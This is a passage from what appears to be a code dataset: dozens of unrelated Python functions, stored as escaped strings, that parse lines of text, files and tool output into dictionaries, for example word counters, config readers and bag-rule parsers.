line.lstrip().startswith('#')\n and not line.lstrip().startswith('!')\n ):\n k, v = re.split(r'\\s*[:=]\\s*', line, maxsplit=1)\n result[k] = v.strip()\n return result", "def create_dicts(path):\n line_d = {}\n rel_d = {}\n\n with open(path) as f:\n for line in islice(f, 0, None, 4):\n lister = 
line.split('\"')\n line_number = int(lister[0].split('\\t')[0])\n line_d[line_number] = ''.join(str(s) for s in lister[1:])\n \n with open(path) as f:\n for i, line in enumerate(islice(f, 1, None, 4)):\n rel_d[i] = line.split('\\n')[0]\n \n return (line_d, rel_d)", "def _convert_tags_to_dict(text_list_tags):\n return OrderedDict([re.findall(r\"\"\"\\s*_(\\w+)\\s+(.+?)\\s*$\"\"\", row)[0] for row in text_list_tags])", "def qsl():\n new_line = temp.splitlines()\n qs_line = []\n reltype = []\n for i in range(len(new_line)):\n if \"QSLINK\" in new_line[i]:\n qs_line.append(new_line[i].split('\" '))\n for i in range(len(qs_line)):\n reltype.append(qs_line[i][5].split('=\"')[1])\n setList = list(set(reltype))\n my_dict = {i: reltype.count(i) for i in setList}\n print(my_dict)", "def build_dict(fname):\n\t\n\twith open(fname) as file:\n\n\t\tword_count_dict = {}\n\n\t\tfor line in file:\n\t\t\tline = line.rstrip()\n\t\t\tline =line.split(' ')\n\t\t\tfor word in line:\n\t\t\t\tword = word.strip('\"!.,?_;():')\n\t\t\t\tword = word.lower()\n\t\t\t\tword_count_dict[word] = word_count_dict.get(word, 0) + 1\n\t\t#return word_count_dict\n\n\t\tfor each in word_count_dict:\n\t\t\tcount = word_count_dict[each]\n\t\t\tprint(each, count)\n\n\t\treturn", "def pgn2dict(txt):\n result = {}\n for line in txt:\n if not line:\n continue\n match = re.search(r'(\\w+) \"(.*)\"', line).groups()\n result[match[0]] = match[1].replace(\"'\", \"''\")\n\n return result", "def create_names_dict(infile):\n return [name.strip(\"\\n\") for name in open(infile, \"r\")]", "def parse_output(output):\n lines = output.splitlines()[3:-1]\n r = {}\n for line in lines:\n kv = filter(None, line.split('|'))\n kv = [x.strip() for x in kv]\n r.update({kv[0]: kv[1]})\n return r", "def parse_to_dicts(lines, containers):\n\n pairs = [(a, b.strip()) for a, b in (m.split(':', 1) for m in lines)]\n item = {}\n kind, name = None, None\n for j in range(0, len(pairs)):\n if pairs[j][0] in containers.keys():\n if j != 0:\n containers[kind].append((name, item))\n item = {}\n kind = pairs[j][0]\n name = pairs[j][1]\n else:\n item[pairs[j][0]] = pairs[j][1]\n if kind is not None:\n containers[kind].append((name, item))\n\n return containers", "def inf2dict(text):\n lines = text.strip().split('\\n')\n pairs, extra_lines = split_lines(lines)\n return parse_pairs(pairs, extra_lines)", "def to_dictionary(file):\n\n\tfin = open(file)\n\td = dict()\n\n\tfor line in fin:\n\t\td[line.strip()] = ''\n\treturn d", "def prepare_looped_lines(self, alldict, comblist):\n loopline_dict=dict()\n for stridx in comblist:\n lidx = int(stridx.split('-')[0])\n loopidx = int(stridx.split('-')[1])\n loopline_dict[lidx] = alldict[lidx]['prepend'] + alldict[lidx]['looplist'][loopidx].strip() + alldict[lidx]['append'] + '\\n'\n return loopline_dict", "def parse(line):\n return dict([pair.split(':') for pair in line.split()])", "def builddictionary(dirlist):\n init_dictionary={}\n for string in dirlist:\n splitstring=string.split(\"\\t\")\n if len(splitstring) == 2:\n init_dictionary[splitstring[1].strip(\"\\n\")] = [int(splitstring[0]), 0]\n return init_dictionary", "def prepare_data(data: list) -> dict:\n d = {}\n for t in data:\n d[t[0]] = read_text(t[1])\n return d", "def get_contents(path : str) -> dict[str, dict[str, int]]:\n with open(path, \"r\") as f:\n lines = f.readlines();\n \n contents = {}\n\n # Could use regex here, but hardly seems necessary due to the input size.\n for line in lines:\n try:\n bag, contains = line.split(\" bags contain \");\n except:\n 
continue\n\n contents[bag] = Counter()\n if contains.startswith(\"no\"): continue\n\n # separate types\n for item in contains.split(\", \"):\n parts = item.split();\n color = parts[1] + \" \" + parts[2]\n count = int(parts[0])\n contents[bag][color] = count\n \n return contents", "def _parse_long(value):\n dict_value = {}\n\n for line in value.split('\\n'):\n if ':' in line:\n k, v = line.split(':', 1)\n dict_value[k.strip()] = v.strip()\n\n return dict_value", "def parse_branches(branch_list):\n return dict(x.lstrip('# ').split(maxsplit=1) for x in branch_list)", "def parse_listings(listings_raw):\n listings = {}\n for alist in listings_raw:\n name_key = parse_key_string(alist)\n if ignore_listings(name_key):\n continue\n if name_key not in listings:\n listings[name_key] = []\n listings[name_key].append(alist)\n with open('listings.modified.txt', 'w') as file_:\n file_.write(json.dumps(listings, sort_keys=True, indent=2))\n length_listings(listings)\n return listings", "def _parse_handle_section(lines):\n data = {}\n key = ''\n next(lines)\n\n for line in lines:\n line = line.rstrip()\n if line.startswith('\\t\\t'):\n if isinstance(data[key], list):\n data[key].append(line.lstrip())\n elif line.startswith('\\t'):\n key, value = [i.strip() for i in line.lstrip().split(':', 1)]\n key = normalize(key)\n if value:\n data[key] = value\n else:\n data[key] = []\n else:\n break\n\n return data", "def potcar_str2dict(potcar_list: Optional[str]) -> dict:\n if potcar_list is None:\n return {}\n elif isinstance(potcar_list, str):\n potcar_list = potcar_list.split()\\\n\n d = {}\n for p in potcar_list:\n element = p.split(\"_\")[0]\n d[element] = p\n return d", "def __line_parse(index: int, line: list, dictionary: dict, word_list: list):\n\n if index + 2 >= len(line):\n return\n word_1 = line[index + 2]\n word_2 = line[index + 1]\n word_3 = line[index]\n if word_1 == \"\" or word_2 == \"\" or word_3 == \"\":\n return\n\n if word_1 not in dictionary:\n dictionary[word_1] = {\n str(word_1 + \"_1\"): {\n\n },\n str(word_1 + \"_2\"): {\n\n },\n str(word_1 + \"_3\"): {\n\n }\n }\n if word_2 not in dictionary:\n dictionary[word_2] = {\n str(word_2 + \"_1\"): {\n\n },\n str(word_2 + \"_2\"): {\n\n },\n str(word_2 + \"_3\"): {\n\n }\n }\n if word_3 not in dictionary:\n dictionary[word_3] = {\n str(word_3 + \"_1\"): {\n\n },\n str(word_3 + \"_2\"): {\n\n },\n str(word_3 + \"_3\"): {\n\n }\n }\n if word_1 not in word_list:\n word_list.append(word_1)\n if word_2 not in word_list:\n word_list.append(word_2)\n if word_3 not in word_list:\n word_list.append(word_3)\n \"\"\" word_3 word_2 word_1\"\"\"\n if word_2 not in dictionary[word_1][str(word_1 + \"_1\")]:\n dictionary[word_1][str(word_1 + \"_1\")][word_2] = 1\n else:\n dictionary[word_1][str(word_1 + \"_1\")][word_2] = dictionary[word_1][str(word_1 + \"_1\")][word_2] + 1\n if word_3 not in dictionary[word_1][str(word_1 + \"_2\")]:\n dictionary[word_1][str(word_1 + \"_2\")][word_3] = 1\n else:\n dictionary[word_1][str(word_1 + \"_2\")][word_3] = dictionary[word_1][str(word_1 + \"_2\")][word_3] + 1\n if word_3 not in dictionary[word_2][str(word_2 + \"_1\")]:\n dictionary[word_2][str(word_2 + \"_1\")][word_3] = 1\n else:\n dictionary[word_2][str(word_2 + \"_1\")][word_3] = dictionary[word_2][str(word_2 + \"_1\")][word_3] + 1\n if index + 3 >= len(line) or line[index + 3] == \"\":\n return\n word_0 = line[index + 3]\n if word_0 not in dictionary:\n dictionary[word_0] = {\n str(word_0 + \"_1\"): {\n\n },\n str(word_0 + \"_2\"): {\n\n },\n str(word_0 + \"_3\"): 
{\n\n }\n }\n\n if word_0 not in word_list:\n word_list.append(word_0)\n\n if word_3 not in dictionary[word_0][str(word_0 + \"_3\")]:\n dictionary[word_0][str(word_0 + \"_3\")][word_3] = 1\n else:\n dictionary[word_0][str(word_0 + \"_3\")][word_3] = dictionary[word_0][str(word_0 + \"_3\")][word_3] + 1", "def dict_make():\n f = open('words.txt','r')\n dict1 = f.read().splitlines()\n return filter(lambda z:len(z) >= 4, dict1)", "def makeGcauCfgDictFromAgc(lineList): \r\n diction = {}\r\n withinCfgData = False\r\n for eachString in lineList:\r\n if re.match(RE_COMPILED_CFG_START, eachString):\r\n withinCfgData = True\r\n elif re.match(RE_COMPILED_CFG_END, eachString):\r\n withinCfgData = False\r\n elif withinCfgData:\r\n p = re.match(RE_COMPILED_CFG_ITEM, eachString)\r\n if p:\r\n obj = p.groups()[0]\r\n attr = p.groups()[1]\r\n val = p.groups()[2]\r\n if obj not in diction:\r\n diction[obj] = {}\r\n diction[obj][attr] = val\r\n return diction", "def createDict(self):\n data = d.Dictionary.dictionary\n while True:\n filtered = [line.strip() for line in data if len(line) == self.wordLen]\n if len(filtered) == 0:\n self.setNewLen()\n else:\n break\n return filtered", "def parse_file(text):\n tmp = list(map(lambda x: x.replace('\\n', ''), text.split(';')))\n output = {}\n for item in tmp:\n if not '=' in item:\n continue\n firstequal = item.find('=')\n identifier = item[:firstequal].strip()\n obj = item[firstequal + 1:].strip()\n output[identifier] = obj\n return output", "def read_desc(fname):\n dict_ = {}\n with open(fname, 'r') as handle:\n for i, line in enumerate(handle):\n list_ = shlex.split(line)\n if 7 <= i < 10:\n if list_[0] in ['All', 'Treated', 'Untreated']:\n dict_[list_[0]] = {}\n dict_[list_[0]]['Number'] = list_[1:]\n elif 20 <= i < 23:\n print(list_)\n if list_[0] == 'Observed':\n dict_['All'][list_[0] + ' ' + list_[1]] = list_[2:]\n else:\n dict_['All'][list_[0] + ' ' + list_[1] + ' ' + list_[2]] = list_[3:]\n elif 29 <= i < 32:\n if list_[0] == 'Observed':\n dict_['Treated'][list_[0] + ' ' + list_[1]] = list_[2:]\n else:\n dict_['Treated'][list_[0] + ' ' + list_[1] + ' ' + list_[2]] = list_[3:]\n elif 38 <= i < 41:\n if list_[0] == 'Observed':\n dict_['Untreated'][list_[0] + ' ' + list_[1]] = list_[2:]\n else:\n dict_['Untreated'][list_[0] + ' ' + list_[1] + ' ' + list_[2]] = list_[3:]\n\n return dict_", "def process_entries(entries):\n data = {}\n for e in entries:\n e = e.strip()\n if e and not e.startswith('#') and not e.startswith('-e'):\n project, version = e.split('==')\n if not version:\n raise ValueError(\"Unexpected syntax '{0}'\".format(e))\n data[project] = version\n return data", "def postprocess_ini_section_items(items: Union[Mapping, Iterable]) -> Generator:\n splitter_re = re.compile('[\\n\\r\\t]+')\n if isinstance(items, Mapping):\n items = items.items()\n for k, v in items:\n if v.startswith('\\n'):\n v = splitter_re.split(v[1:])\n v = [vv.strip() for vv in v if vv.strip()]\n v = [vv for vv in v if not vv.startswith('#')] # remove commented lines\n yield k, v", "def parse_perf_stat_output(perf_stat_output: str, perf_counters: List[str]):\n counters_dict = {}\n for line in perf_stat_output.split('\\n'):\n for perf_counter in perf_counters:\n if perf_counter in line:\n count_string = re.findall(r'^\\s*\\d*', line)[0].replace(' ', '')\n count = int(count_string)\n counters_dict[perf_counter] = count\n return counters_dict", "def create_dict(fd):\n # initialize an empty dictionary\n full_dict = {}\n # loop through file\n for line in fd:\n # lowercase everything 
in line, then split line into a list\n line = line.lower().split()\n # loop through elements in the list of words in the splitted line\n for word in line:\n # strip words from puncuation using string module\n word = word.strip(string.punctuation)\n # if words contains only alphabatic characters and of length > 1\n if word.isalpha() and len(word)!= 1:\n if len(word) in full_dict:\n full_dict[len(word)].add(word)\n else:\n full_dict[len(word)] = set()\n full_dict[len(word)].add(word)\n return full_dict", "def _parse_metadata_fields(key_value_block: str) -> Dict[str, str]:\n key_value_block = key_value_block.lstrip()\n field_lines = re.split(r'\\n', key_value_block)\n field_name = 'unknown'\n fields_builder: Dict[str, str] = {}\n for field_line in field_lines:\n field_match = RE_FIELD_COMPONENTS.match(field_line)\n if field_match and field_match.group('field') in NAMED_FIELDS:\n field_name = field_match.group(\n 'field').lower().replace('-', '_')\n field_name = re.sub(r'_no$', '_num', field_name)\n fields_builder[field_name] = field_match.group(\n 'value').rstrip()\n elif field_name != 'unknown':\n # we have a line with leading spaces\n fields_builder[field_name] += re.sub(r'^\\s+', ' ', field_line)\n return fields_builder", "def read_transfile(lines: List[str], strip_punc=True, weighted=False, lowercase=True, length=0) -> Dict[str, Dict[str, float]]:\n data = OrderedDict()\n first = True\n options = {}\n key = \"\"\n keylen = 0\n for line in lines:\n if lowercase:\n line = line.strip().lower()\n else:\n line = line.strip()\n # in a group, the first one is the KEY. \n # all others are part of the set. \n if len(line) == 0:\n first = True\n if len(key) > 0 and len(options) > 0:\n if key in data:\n print(f\"Warning: duplicate sentence! {key}\")\n if length == 0 or length == keylen:\n data[key] = options\n options= {}\n else:\n if first:\n key, prompt = line.strip().split(FIELDSEP)\n keylen = len(prompt.split())\n first = False\n else:\n # allow that a line may have a number at the end specifying the weight that this element should take. 
\n # this is controlled by the weighted argument.\n # gold is REQUIRED to have this weight.\n if FIELDSEP in line:\n text, weight = line.strip().split(FIELDSEP)\n else:\n text = line.strip()\n weight = 1\n\n if strip_punc:\n text = remove_punctuation(text)\n\n options[text] = float(weight)\n\n # check if there is still an element at the end.\n if len(options) > 0 and (length == 0 or length == keylen):\n data[key] = options\n\n return data", "def create_dict_from_file(filename, delimeters, first_char, column_names):\n\n # This opens the\n measurement_output = open('measurement_output.txt', \"w\", encoding=\"utf8\")\n # This creates and initializes a list to serve as a dictionary container outside of the for-loop.\n measurements_file_container = {}\n\n # This opens the file and then splits it (preserving the commas because of the landfall count requirement).\n if not filename.endswith('.txt'):\n print('Input File Must Be a .txt File')\n return None\n elif delimeters != '{}=|{}=|{}='.format(column_names[0], column_names[1], column_names[2]):\n print('Please Check Syntax for Delimeters and colunm_names.')\n return None\n else:\n with open(filename, 'r') as infile:\n for line in infile:\n line = line.strip()\n # This checks to see if line begins with a numeric character; if so, it is a header for a new measurement.\n if line[0].isnumeric():\n measurement_current_line = line.split()\n # This initializes a new measurement dictionary with the 3 items in column_names\n key = measurement_current_line[0]\n new_measurement_dictionary = {\n column_names[0]: '0',\n column_names[1]: '0',\n column_names[2]: '0',\n }\n #print(measurement_current_line)\n # this determines if a line starts with 'X', splits it at the X =,Y =,Z = indicators\n # to spit out a list containing only the 3 values and then updates the corresponding\n # value in the dictionary\n if line[0] == first_char:\n measurement_current_line = re.split(delimeters, line.strip(' '))\n if len(measurement_current_line) == 4:\n new_measurement_dictionary[column_names[0]] = float(measurement_current_line[1].strip())\n new_measurement_dictionary[column_names[1]] = float(measurement_current_line[2].strip())\n new_measurement_dictionary[column_names[2]] = float(measurement_current_line[3].strip())\n measurements_file_container[key] = new_measurement_dictionary\n # this stops the processing when the end of data key '$$EOE' is reached.\n elif line == '$$EOE':\n break\n\n\n return(measurements_file_container)", "def parse_list_output(output):\n lines = output.splitlines()\n keys = filter(None, lines[1].split('|'))\n keys = [x.lower().strip() for x in keys]\n r = []\n for line in lines[3:-1]:\n if len(line.split()) <= 1:\n continue\n values = filter(None, line.split('|'))\n values = [x.strip() for x in values]\n assert len(keys) == len(values)\n record = dict(zip(keys, values))\n r.append(record)\n return r", "def mkwrddct(inputfile):\n fin = open(inputfile)\n words = dict()\n for line in fin:\n w = line.strip()\n words[w] = w\n return words", "def __line_parse_4(index: int, line: list, dictionary: dict, word_list: list):\n if index + 4 >= len(line):\n return\n word_1 = line[index + 4]\n word_2 = line[index + 3]\n word_3 = line[index + 2]\n word_4 = line[index + 1]\n word_5 = line[index]\n\n if word_1 == \"\" or word_2 == \"\" or word_3 == \"\" or word_4 == \"\" or word_5 == \"\":\n return\n\n if word_1 not in dictionary:\n dictionary[word_1] = {\n str(word_1 + \"_4\"): {\n\n }\n }\n if word_1 not in word_list:\n word_list.append(word_1)\n\n \"\"\"word_5 
word_4 word_3 word_2 word_1\"\"\"\n if word_5 not in dictionary[word_1][str(word_1 + \"_4\")]:\n dictionary[word_1][str(word_1 + \"_4\")][word_5] = 1\n else:\n dictionary[word_1][str(word_1 + \"_4\")][word_5] = dictionary[word_1][str(word_1 + \"_4\")][word_5] + 1", "def make_lex_dict(self):\n lex_dict = {}\n for line in self.lexicon_full_filepath.split('\\n'):\n sp = line.strip().split('\\t')\n if(len(sp) > 1):\n (word, measure) = line.strip().split('\\t')[0:2]\n lex_dict[word] = float(measure)\n return lex_dict", "def _parse_line(self):\n # check if line contains a rule or not\n stripped = self._line.strip()\n if not stripped or stripped.startswith(\"#\"):\n return None\n\n # strip out double quotes from values, and simplify equals strings\n simplified = self._line.replace(\"==\", \"=\").replace('\"', '')\n\n # return a dictionary formed from the key=value pairs found in line\n return dict(f.strip().split(\"=\", 1) for f in simplified.split(\",\"))", "def parse_line(line):\n parts = line.strip().split('\\t')\n\n output = {}\n\n if len(parts) != len(COLUMNS):\n raise Exception('Incorrect number of columns in line.', parts, COLUMNS)\n\n for key, value in zip(COLUMNS, parts):\n if key == 'attributes':\n output[key] = parse_attributes(value)\n elif key == 'start' or key == 'stop':\n output[key] = int(value)\n else:\n output[key] = value\n\n return output", "def get_rules(data: List[str]) -> Dict[str, Dict[str, int]]:\n contains_split = re.compile(r\"bags?.?$\")\n bags = {}\n\n for line in data:\n color, contains = line.split(\" bags contain \")\n if not contains == \"no other bags.\":\n contains = [contains_split.sub(\"\", item).strip() for item in contains.split(\",\")]\n sub_bags = dict(reversed(a.split(\" \", 1)) for a in contains)\n else: # If there aren't any bags within the bag\n sub_bags = {}\n bags.update({color: sub_bags})\n\n return bags", "def from_file_to_list(input_file):\n\tfile = open(input_file)\n\n\tdict_values = [\"\" for k in range(8)]\n\n\tfor line in file:\n\t\ts = line.split(\" \")\n\t\ts.pop(0) # first column only indicate line's number\n\t\ts.remove('\\n')\n\t\tfor idx, a in enumerate(s):\n\t\t\tdict_values[idx] += a\n\n\n\tfile.close\n\n\treturn dict_values", "def list2dict(L):\n\n dd = {i: L[i].split('\\t') for i in range(len(L))} # auxiliary dict\n D = {}\n # Construct output dictionary of key-value pairs:\n D[dd[0][0]] = {dd[1][0]: dict(zip(dd[0][1:], dd[1][1:])),\n dd[2][0]: dict(zip(dd[0][1:], dd[2][1:]))}\n return D", "def list_to_word_count_dict(self,l):\n to_return = {}\n for i,word in enumerate(l):\n to_return[(word,i)] = 0\n return to_return", "def build_tree(lines: []) -> {}:\n key_regex = re.compile(r\"(?P<key_val>^.*) bags contain(?P<contents>.*$)\")\n values_regex = re.compile(r\"(?P<count>\\d) (?P<color>.+?(?= bag))\")\n bag_map = {}\n for line in lines:\n match = key_regex.match(line)\n key = match['key_val']\n bag_map[key] = {}\n contents = match['contents']\n content_matches = values_regex.findall(contents)\n for color_match in content_matches:\n bag_map[key][color_match[1]] = int(color_match[0])\n\n return bag_map", "def parse_entry(tr):\n\ttr = tr.replace('\"', '')\n\ttrl = tr.split(\"; \")\n\ttrdict = OrderedDict()\n\n\tfor j in trl:\n\t\tk = j.split(\" \")\n\n\t\tif k[0] in trdict:\n# print \"%s already in dict\" % (k[0])\n\t\t\ttrdict[k[0]].append(k[1])\n\t\telse: \n\t\t\ttrdict[k[0]]=[k[1]]\n\treturn trdict", "def headers_raw_to_dict(headers_raw):\n\n if headers_raw is None:\n return None\n headers = headers_raw.splitlines()\n headers_tuples = 
[header.split(':', 1) for header in headers]\n\n result_dict = {}\n for header_item in headers_tuples:\n if not len(header_item) == 2:\n continue\n\n item_key = header_item[0].strip()\n item_value = header_item[1].strip()\n result_dict[item_key] = item_value\n\n return result_dict", "def _split_by_keypair(self, osw_dict={}): \n lst = osw_dict\n keypair_dict = []\n for d in lst:\n if d['key'] == 'raw_line':\n keypair_lst = re.split(r',',d['value'])\n \n for k,v in keypair_lst:\n _d = [{'timestamp':d['timestamp'] , \n 'category': d['category'], \n 'sub_category': d['sub_category'], \n 'key': k, \n 'value': v}]\n keypair_dict.extend(_d)\n \n return keypair_dict", "def create_dict(self, data):\n\n for i in range(len(data)):\n for j in range(len(data[i])):\n if i+1 < len(data) and \":\" in data[i][j] and \"}\" not in data[i] and \"{\" not in data[i] and data[i+1][0] == \"{\":\n data[i] = data[i] + [data[i+1][0]]\n data[i+1] = data[i+1][1:]\n\n if \":\" in data[i][j] and data[i][j+1] != \"{\":\n data[i][j+1] += \",\\n\"\n elif data[i][j] == \"}\":\n data[i][j] = \"},\\n\"\n elif data[i][j] == \"{\":\n data[i][j] = \"{\\n\"\n data = \"\".join([\"\".join(i) for i in data])\n data = self.separate(data)\n result = []\n\n for item in data:\n ind = item.index(\":\")\n name = item[1:ind-1] # fetch name of date and remove quotes\n if \"{\" in item:\n con = ast.literal_eval(item[ind+1:])[0]\n else:\n con = item[ind+2:-3]\n result.append([name, con])\n return result", "def syllable_dict():\n counts = dict()\n \n with open('data/Syllable_dictionary.txt') as file:\n for line in file:\n arr = line.split(' ', 1)\n if 'E' in arr[1]:\n cts = arr[1].split(' ', 1)\n counts[arr[0].strip('\\'')] = int(cts[1][0])\n counts[(arr[0].strip('\\'') + \"_\")] = int(cts[0][1])\n else:\n counts[arr[0].strip('\\'')] = int(arr[1][0])\n return counts", "def lint_results_to_dict(lint_output):\n data = [line for line in lint_output.split('\\n') if (\n line and line.strip() and line[:10] != ('*'*10))]\n if not data:\n return {'outcome' : 'success'}\n result = {'outcome' : 'issues', 'count' : len(data), \n 'issues' : [line.split(':') for line in data]}\n return result", "def ingest(in_info):\n if type(in_info) == str:\n with open(in_info) as infile:\n lines = (line.split(None) for line in infile)\n in_dict = {defn[0] : defn[1:] for defn in lines}\n else:\n in_dict = in_info\n return in_dict", "def mapper(list_of_textlines):\n text = [i.lower() for i in list_of_textlines]\n text = [re.subn(\"\\s+|\\n+\", \" \", i)[0] for i in text]\n text = [re.subn(\"[.!@#$%^&*()-_+=,./?\\\"'|\\}{:;]+\", \" \", i)[0] for i in text]\n text = [re.split(\"\\s+\", i) for i in text]\n text = [[i for i in j if i != ''] for j in text]\n text = [i for i in text if len(i) > 0]\n text = [item for sublist in text for item in sublist]\n\n return text", "def MinimalBpseqParser(lines):\n result = {'HEADER':[], 'SEQ_STRUCT':[]}\n \n for line in lines:\n if line.startswith('Filename') or line.startswith('Organism') or\\\n line.startswith('Accession') or line.startswith('Citation') or\\\n \":\" in line:\n result['HEADER'].append(line.strip())\n elif len(line.split()) == 3:\n result['SEQ_STRUCT'].append(line.strip())\n else:\n continue #unknown\n return result", "def file2dict(file, dict, start_id):\n id = start_id\n line_number = 0\n file.seek(0)\n for line in file:\n if line_number == 0:\n n_atoms = int(float(line.strip()))\n if line_number >= 2 and line_number < n_atoms + 2:\n values_list = line.split()\n for i in range(1, 4):\n values_list[i] = 
float(values_list[i])\n dict[id] = {\n \"coor\": values_list[1:],\n \"element\": values_list[0]\n }\n id += 1\n line_number += 1\n return dict", "def main_dictionary():\n for lyric in lyrics:\n for line in lyric.split(\"\\n\"):\n dictionary(line.split(\" \"))", "def read_line2(path):\n f = open(path, 'r', encoding='utf-8')\n lines = f.readlines()\n data = {}\n for idx, i in enumerate(lines):\n data[idx] = i.strip()\n return data", "def _read_header_line_1(self, lines: list) -> dict:\n fields = (\n \"model_id\",\n \"unit_id\",\n \"software_level\",\n \"message_number\",\n \"message_subclass\",\n )\n if self._is_ct25k():\n indices = [1, 3, 4, 6, 7, 8]\n else:\n indices = [1, 3, 4, 7, 8, 9]\n values = [split_string(line, indices) for line in lines]\n return values_to_dict(fields, values)", "def _parse(self, content):\n os.environ['ASTER_VERSION_DIR'] = self.dirn\n cfg = {}\n self._content = content\n for l in split_endlines(self._content):\n if not re.search('^[ ]*#', l):\n try:\n typ, nam, ver, val = l.split('|')\n #print '========>', typ, '//', nam, '//', ver, '//', val\n typ = re.sub('^[ ]*', '', re.sub('[ ]*$', '', typ)).strip()\n val = re.sub('^[ ]*', '', re.sub('[ ]*$', '', val)).strip()\n if val != '':\n val = osp.expandvars(val)\n if cfg.has_key(typ):\n cfg[typ].append(val)\n else:\n cfg[typ] = [val]\n except ValueError:\n pass\n return cfg", "def test_parse_mapping_file_to_dict(self):\r\n s1 = ['#sample\\ta\\tb', '#comment line to skip',\r\n 'x \\t y \\t z ', ' ', '#more skip', 'i\\tj\\tk']\r\n exp = ([['x', 'y', 'z'], ['i', 'j', 'k']],\r\n ['sample', 'a', 'b'],\r\n ['comment line to skip', 'more skip'])\r\n mapdict, comments = parse_mapping_file_to_dict(s1)\r\n expdict = {'x': {'a': 'y', 'b': 'z'}, 'i': {'a': 'j', 'b': 'k'}}\r\n self.assertEqual(mapdict, expdict)\r\n self.assertEqual(comments, ['comment line to skip', 'more skip'])", "def get_id2exonlen_id2line(lines):\n id2exonlen = dict()\n id2line = dict()\n for line in lines:\n (chrom, chromStart, chromEnd, name, score, strand, thickStart, thickEnd, itemRgb, blockCount, blockSizes, blockStarts) = line.rstrip().split(\"\\t\") \n id2exonlen[name] = sum_comma_sep_str(blockSizes)\n id2line[name] = line\n return(id2exonlen, id2line)", "def parse_pizza_info(l):\n\n pizza_dict = {}\n\n for i, element in enumerate(l):\n if element.strip() == '<span class=\"meal-name\" itemprop=\"name\">':\n\n # Names of pizza\n pizza_name = l[i+1].split('<')[0].strip()\n pizza_dict[pizza_name] = []\n\n elif '<div class=\"meal-description-additional-info\" itemprop=\"description\">' in element:\n\n pizza_dict[pizza_name] = re.split(',|and',re.split('<|>|\\(', element.strip())[2])\n pizza_dict[pizza_name] = [x.strip() for x in pizza_dict[pizza_name]]\n pizza_dict[pizza_name] = [x.strip('-') for x in pizza_dict[pizza_name]]\n\n return pizza_dict", "def lines():\n line_dict = {}\n #\n line_dict['ArI'] = 2**0\n line_dict['HgI'] = 2**1\n line_dict['KrI'] = 2**2\n line_dict['NeI'] = 2**3\n line_dict['XeI'] = 2**4\n line_dict['CdI'] = 2**5\n line_dict['ZnI'] = 2**6\n line_dict['HeI'] = 2**7\n line_dict['OH_R24000'] = 2**8\n line_dict['OH_triplespec'] = 2**9\n line_dict['CuI'] = 2**10\n line_dict['ArII'] = 2**11\n line_dict['OH_XSHOOTER'] = 2**12\n line_dict['OH_GNIRS'] = 2**13\n line_dict['OH_NIRES'] = 2**14\n line_dict['ThAr_XSHOOTER_VIS'] = 2**15\n line_dict['OH_GMOS'] = 2**16\n line_dict['OH_MODS'] = 2**17\n line_dict['ThAr_MagE'] = 2**18 # R=4100\n line_dict['OH_FIRE_Echelle'] = 2**19 # R=6000\n line_dict['Ar_IR_GNIRS'] = 2**20 # R=6000\n line_dict['FeI'] = 
2**21\n line_dict['FeII'] = 2**22\n line_dict['UNKNWN'] = 2**23\n line_dict['Ar_IR_MOSFIRE'] = 2 ** 24\n line_dict['Ne_IR_MOSFIRE'] = 2 ** 25\n line_dict['OH_MOSFIRE_Y'] = 2 ** 26\n line_dict['OH_MOSFIRE_J'] = 2 ** 27\n line_dict['OH_MOSFIRE_H'] = 2 ** 28\n line_dict['OH_MOSFIRE_K'] = 2 ** 29\n line_dict['ThAr_XSHOOTER_UVB'] = 2**30\n #\n return line_dict", "def _to_dict(self, data_list):\n data_dict = dict(pair.split('=') for pair in data_list)\n return data_dict", "def handle_data(data):\n items = data.split(',')\n items.sort()\n results = {}\n i = 1\n for item in items:\n it = item.split(' ')\n results[i] = (it[0], it[1], int(it[2]))\n print str(i) + \" \" + it[0]\n i += 1\n return results", "def _parse(self, fp):\n res = dict()\n key = u\"\"\n value = u\"\"\n escaped = False\n have_key = False\n skip_ws = True\n pending_ws = \"\"\n ignore_comment = False\n unicode_digits = 0\n unicode_buffer = \"\"\n encoding = \"iso-8859-1\"\n line_count = 0\n while True:\n line = fp.readline()\n if line == \"\": # EOF\n if key != \"\": # Save pending key/value\n res[key.encode(\"utf-8\")] = value.encode(\"utf-8\")\n break;\n line_count += 1\n line = line.decode(encoding)\n skip_ws = True # Always skip white space at beginning of line\n for c in line: # Now look at the individual characters\n if unicode_digits > 0:\n unicode_buffer += c\n unicode_digits -= 1\n if unicode_digits > 0:\n continue\n c = unichr(int(unicode_buffer, 16))\n unicode_buffer = \"\"\n if c == '\\r': # ignore CRs\n continue\n if c == '\\t' or c == '\\f': # Map to white space\n c = ' '\n if skip_ws:\n if c == ' ':\n continue\n else:\n skip_ws = False # Found first non white space character\n if not ignore_comment: # i.e. is not continuation line\n if c == '#' or c == '!': # Skip comment lines\n if line_count <= 2:\n mo = self._codingRegex.search(line)\n if mo:\n encoding = mo.group(1) \n break\n ignore_comment = False\n if escaped: # i.e., previous char was '\\'\n escaped = False\n if c == '\\n': # Next line is continuation even when ...\n ignore_comment = True # ... 
looking like a comment\n continue\n if c == 'u':\n unicode_digits = 4\n continue\n else:\n if c == \" \": # whitespace is skipped around keys and values\n pending_ws += \" \"\n continue\n if c == '\\\\':\n escaped = True\n continue\n if (c == ':' or c == \"=\") and not have_key:\n have_key = True\n pending_ws = \"\" # skip white space after key\n skip_ws = True # skip white space before value\n continue\n if c == '\\n': # not escaped, end of key/value pair\n if key != \"\":\n res[key.encode(\"utf-8\")] = value.encode(\"utf-8\")\n key = \"\"\n value = \"\"\n pending_ws = \"\"\n have_key = False\n break # continue with next line\n if not have_key:\n key += (pending_ws + c)\n else:\n value += (pending_ws + c)\n pending_ws = \"\"\n\n return res", "def get_recipes_dict(filename, mode_type, encode):\n with open(filename, mode_type, encoding=encode) as file:\n recipe_dict = dict()\n for line in file:\n dish = line.strip()\n amount = int(file.readline())\n buffer_list = list()\n for item in range(amount):\n ingredient, quantity, measure = file.readline().split('|')\n buffer_list.append(\n {'ingredient_name': ingredient.strip(), 'quantity': int(quantity), 'measure': measure.strip()}\n )\n recipe_dict[dish] = buffer_list\n file.readline()\n return recipe_dict", "def extract_all_albums(lines):\n album_dict = {}\n for index, line in enumerate(lines):\n if line.startswith(\"<a\"):\n line_index = int(index)\n line = line.strip()\n albumid = int((lines[index + 1]).strip())\n album_classed = extract_album(lines, line_index)\n album_dict[albumid] = album_classed #assigns the key(id) to the values\n return album_dict", "def _CleanChunk(self, chunk):\n mystr = '\\n'.join(chunk)\n p2 = re.compile(self.pat+'(.*)}', re.DOTALL)\n q2 = p2.search(mystr)\n code = q2.group(2)\n code = 